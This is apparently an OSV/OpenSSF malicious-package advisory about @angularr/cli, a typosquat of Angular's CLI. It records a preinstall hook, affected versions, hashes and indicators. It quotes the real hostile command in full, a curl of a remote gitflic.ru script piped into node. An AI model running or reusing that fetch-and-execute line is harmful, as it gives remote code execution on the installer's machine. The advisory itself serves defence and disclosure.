MAL-2026-17492

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/cli/MAL-2026-17492.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17492
Published
2026-10-04T23:17:38Z
Modified
2026-10-04T23:45:18Z
Summary
Malicious code in @angularr/cli (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)

Package is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any npm install @angularr/cli performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020906",
            "import_time":  "2026-10-04T23:40:40.629757118Z",
            "modified_time":  "2026-10-04T23:17:38Z",
            "sha256":  "122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8",
            "source":  "amazon-inspector",
            "versions":  [
                "22.2.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @angularr/cli

Package

Name
@angularr/cli
View open source insights on deps.dev
Purl
pkg:npm/%40angularr/cli

Affected ranges

Affected versions

22.*
22.2.1

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "eb95ee065027d871536fb430be906c3856e640190f36dab01b93d64a1af758e5",
            "tlsh":  "0f313576dae01d6316d9128598360903b43c962f0e06fa78f799540c4f8f69f2277aae"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "cli-22.2.1.tgz",
            "hashes":  {
                "sha1":  "94202cdd816372a4adc8fcc2ddd9927dcff0419e",
                "sha512_sri":  "sha512-aJaBpCe9lyh6F8tsoVtJoKH6/D18aL6tGzQ/OMROYu6NTtcDA+u/WNxoFVyONE3Tt3uXjf9cTcG/l+iGvLx9Ig=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/cli/MAL-2026-17492.json"